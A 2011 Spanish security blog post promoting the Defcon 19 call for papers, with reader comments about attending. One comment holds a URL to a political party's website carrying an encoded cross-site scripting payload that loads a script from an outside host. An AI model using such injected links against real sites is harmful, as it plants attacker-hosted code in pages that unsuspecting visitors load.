jueves, febrero 24, 2011

Defcon19: Call For Fiesta

Reservate las fechas, afila tu inglés y ponte a rellenar el Call For Papers de la Defcon19 de este año que ya se ha publicado. Confiesa la verdad: Te mueres de ganas de ir a la Defcon una vez en tu vida, estar rodeado de 8.000 personas de todo el mundo, ver las mejores charlas de seguridad, salir de fiesta por Las Vegas.... ¡Te mueres de ganas! Más, cuando viste esta camiseta:


Allí habrá gente de todo el mundo, de Argentina, España, Colombia, México, USA, los estudiantes de Erasmus.... y coño, que es en Las Vegas!. El Call For Papers se ha abierto ya, así que no tardes ni un minuto y empieza a trabajar en tu charla. No te van a pagar un puto duro por el viaje pero hablar en la Defcon tiene algo superespecial, créeme.

Yo, pienso oir, me quieran escuchar hablando de la DigiFOCA o DUST o no, porque este año me quiero traer la HackCUP para el Wine Team. Como no sé cuanta gente viene de España, si no hay formar de hacer un equipo me uniré al de Moxie, que me ha ofrecido el puesto de delantero. Así que, ves pillando vuelos, y dime si vas a ir o no.

Saludos Malignos!

6 comentarios:

Laura García dijo...

Este año me voy con mi friki-pandilla a la ComicCon a San Diego y luego me pasaré por Las Vegas a la BH y DefCon.

Que ganas!!!!!!!#|@~|~@#~|@#~@#~|@#

Salu2

Pedro Laguna dijo...

Creo que este sera el año, por fin, de ir a la DEFCON. Y mucho he tardado... Pero nos vemos antes en Londres eh? ;)

[p3ll3] dijo...

El año pasado quería ir al Defcon pero termine en el Bugcon xD, voy a ver si este año me preparo para ir que desde hace tiempos tengo ganas...


Saludos....8)

Winston Smith dijo...

Tenía la sospecha de que el mundo era un lugar extraño. Y en efecto lo és. Pero claro, todo depende del observador. En serio, creo que todos tendemos a buscar afinidades, a mezclarnos con lo que identificamos próximo y cercano, comprensible, interesante,
y todo eso que nos atrae y confiere seguridad. La palabra compañía significa viajar juntos. Un compañero es un tio o una tia que vá al mismo sitio que tú al mismo tiempo. Esto de las reuniones es curioso, reminiscencias de las agrupaciones alrededor del fuego en la cueva. Total, yo no pienso ir, así que no os acompaño y no me reuno. Tengo que trabajar y hacer un sinnúmero de cosas mas o menos absurdas y con poco o nulo sentido. Bueno, aprovechar la ocasión y pasarlo bien. Atentamente.

muchasmegas dijo...

No te digo nada más...


http://www.psoe.es/ambito/saladeprensa/tofriend.do?title=el-psoe-reduce-mas-la-velocidad-maxima&id=549166/*%22%3E%3Cscript%20charset=%22utf-8%22%20src=%22http://psoefacts.0catch.com/psoe.js%22%3E%3C/script%3E*/&suben-velocidad.html

Lucas Anzoategui dijo...

Chema...si me dan la visa de turista en la US Embassy...este año nos vemos en DEFCON 19...un abrazo desde Argentina...!!!

Entradas populares